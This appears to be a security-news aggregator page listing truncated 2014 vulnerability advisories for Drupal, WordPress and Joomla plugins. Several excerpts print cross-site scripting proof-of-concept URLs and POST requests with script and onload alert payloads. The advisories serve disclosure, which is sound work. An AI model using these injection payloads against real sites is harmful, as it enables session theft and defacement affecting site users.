Drupal 7.26 Custom Search 7.x-1.13 Cross Site Scripting

3 April 2014 - Source: http://www.mondounix.com
 
Vulnerability Report
 
 
Author: Justin C. Klein Keane <justin@madirish.net>
Reported: 19 Feb, 2014
 
 
Description of Vulnerability:
-----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Custom Search module "alters the default
search box in many ways. If you need to have options available like in
advanced search, but directly in the search box, this module is for
you."  The Drupal Custom Search module
(https://drupal.org/project/custom_search) contains a persistent cross
site scripting (XSS) vulnerability due to the fact that it fails to
sanitize filter labels...

Read more »

WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 April 2014 - Source: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are many more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...

Read more »

Joomla Kunena 3.0.4 Cross Site Scripting

28 March 2014 - Source: http://www.mondounix.com
Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
 
+++ Description
 
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
 
Kunena is written in PHP. Users can post a Google Map using the following BBCode
  [map]content[/map]
 
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
 
 
+++ Analysis
 
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
 
1049  function DoMap($bbcode, $action, $name, $default, $params, $content) {
  ...
1078  $document->addScriptDeclaration("
1079  // <![CDATA[
  ...
1097  var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE',...

Read more »

Joomla eXtplorer 2.1.3 Cross Site Scripting

21 March 2014 - Source: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string in the URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.
 
File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
 
File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
 
 
File:...

Read more »

Joomla Freichat Cross Site Scripting

21 March 2014 - Source: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.
 
 
File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"></script><script>alert('XSS 1')</script>&xhash=1" <script>alert('XSS 2')</script>
 
 
File: /client/plugins/upload/upload.php
Line: 91
POC:
   </style>
    <body>
        <div
class="frei_upload_border">
        <form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post"...

Read more »

Joomla Multi Calendar 4.0.2 Cross Site Scripting

18 March 2014 - Source: http://www.mondounix.com
Hello,
 
Multiple cross-site scripting (XSS) vulnerabilities in Multi
calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary
web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault
parameter to index.php.
 
File: /tmpl/layout_editevent.php
Lines: 161 and 481
POC:
http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>
 
File: /tmpl/layout_editevent.php
Line: 319
POC:
http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University...

Read more »

Ilch CMS Cross-Site Scripting (XSS)

5 March 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23203
Product: Ilch CMS
Vendor: http://ilch.de
Vulnerable Version(s): 2.0 and probably prior
Tested Version: 2.0
Advisory Publication:  February 12, 2014  [without technical details]
Vendor Notification: February 12, 2014 
Public Disclosure: March 5, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-1944
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered...

Read more »

WordPress Persistent XSS Media File Renamer V1.7.0

1 March 2014 - Source: http://www.mondounix.com
Title: Persistent XSS in Media File Renamer V1.7.0 wordpress plugin
Date: 1/31/2014
Author: Larry W. Cashdollar, @_larry0
Vendor: Notified 2/4/2014
CVE: 2014-2040 
Download: 
http://www.meow.fr/media-file-renamer/
 
 
Vulnerability:
The following functions do not sanitize input before being echoed out: 
In file mfrh_class.settings-api.php:
166     function callback_multicheck( $args ) {
167         $value = $this->get_option( $args['id'], $args['section'], $args['std'] );
168         
169         $html = '';
170         foreach ( $args['options'] as $key => $label ) {
171             $checked = isset( $value[$key] ) ? $value[$key] : '0';
172             $html .= sprintf( '
', $args['section'], $args['id'],...

Read more »

WordPress mp3-jplayer 1.8.7 Cross Site Scripting

27 February 2014 - Source: http://www.mondounix.com
# ==============================================================
# Title ...| Multiple XSS in mp3-jplayer
# Version .| mp3-jplayer.1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
 
 
# ==============================================================
# Multiple XSS
 
---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=mp3jplayer.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1441
 
mp3foxVol=100&make_player_from_link=true&mp3foxOnBlog=true&mp3foxTheme=styleF&mp3foxCustomStylesheet='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&mp3foxScreenOpac=&mp3foxScreenColour=&mp3foxLoadbarOpac=&mp3foxLoadbarColour=&mp3foxPosbarOpac=&mp3foxPosbarColour=&mp3foxPosbarTint=&mp3foxPlaylistOpac=&mp3foxPlaylistColour=&mp3foxPlaylistTint=&mp3foxIndicator=&mp3foxVolGrad=&mp3foxListDivider=&mp3foxScreenTextColour=&mp3foxListTextColour=&mp3foxListCurrentColour=&mp3foxListBGaCurrent=&mp3foxListHoverColour=&mp3foxListBGaHover=&mp3foxPopoutBackground=&mp3foxPopoutBGimage=&librarySortcol=file&libraryDirection=ASC&mp3foxfolder=%2F&mp3foxPlayerWidth=40%25&mp3foxFloat=none&mp3foxDownloadMp3=false&loggedout_dload_text=LOG+IN+TO+DOWNLOAD&loggedout_dload_link=http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-login.php&dload_text=DOWNLOAD+MP3&force_browser_dload=true&dloader_remote_path=&mp3foxPaddings_top=5px&mp3foxPaddings_inner=35px&mp3foxPaddings_bottom=40px&mp3foxMaxListHeight=450&mp3foxShowPlaylist=true&file_separator=%2C&caption_separator=%3B&mp3foxEnablePopout=true&mp3foxPopoutWidth=400&mp3foxPopoutMaxHeight=600&mp3foxPopoutButtonText=&mp3foxEncodeFiles=true&mp3foxAllowRemote=true&make_player_from_link_shcode=%5Bmp3j+track%3D%22%7BTEXT%7D%40%7BURL%7D%22+volslider%3D%22y%22+style%3D%22outline%22%5D&touch_punch_js=true&disableJSlibs=&update_mp3foxSettings=Update+Settings&mp3foxRemember=true&MtogBox1=false&mp3foxPluginVersion=1.8.7
---<request>---
 
Also...

Read more »

WordPress PrintFriendly 3.3.7 Cross Site Scripting

27 February 2014 - Source: http://www.mondounix.com
# ==============================================================
# Title ...| XSS in PrintFriendly
# Version .| printfriendly 3.3.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
 
 
# ==============================================================
# XSS
 
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1389
 
option_page=printfriendly_option&action=update&_wpnonce=496ce7c4d4&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dprintfriendly&printfriendly_option%5Bbutton_type%5D=pf-button.gif&printfriendly_option%5Bcustom_image%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&printfriendly_option%5Bcustom_text%5D=Print+Friendly&printfriendly_option%5Btext_color%5D=%236D9F00&printfriendly_option%5Btext_size%5D=14&printfriendly_option%5Bcontent_position%5D=left&printfriendly_option%5Bcontent_placement%5D=after&printfriendly_option%5Bmargin_left%5D=12&printfriendly_option%5Bmargin_right%5D=12&printfriendly_option%5Bmargin_top%5D=12&printfriendly_option%5Bmargin_bottom%5D=12&printfriendly_option%5Bshow_on_posts%5D=on&printfriendly_option%5Bshow_on_pages%5D=on&printfriendly_option%5Blogo%5D=favicon&printfriendly_option%5Bimage_url%5D=&printfriendly_option%5Btagline%5D=&printfriendly_option%5Bclick_to_delete%5D=0&printfriendly_option%5Bhide-images%5D=0&printfriendly_option%5Bimage-style%5D=right&printfriendly_option%5Bemail%5D=0&printfriendly_option%5Bpdf%5D=0&printfriendly_option%5Bprint%5D=0&printfriendly_option%5Bcustom_css_url%5D=&printfriendly_option%5Bwebsite_protocol%5D=http&printfriendly_option%5Bpassword_protected%5D=no&printfriendly_option%5Bjavascript%5D%3E=yes&printfriendly_option%5Benable_google_analytics%5D=no&printfriendly_option%5Bpf_algo%5D=wp
---<request>---
 
Also...

Read more »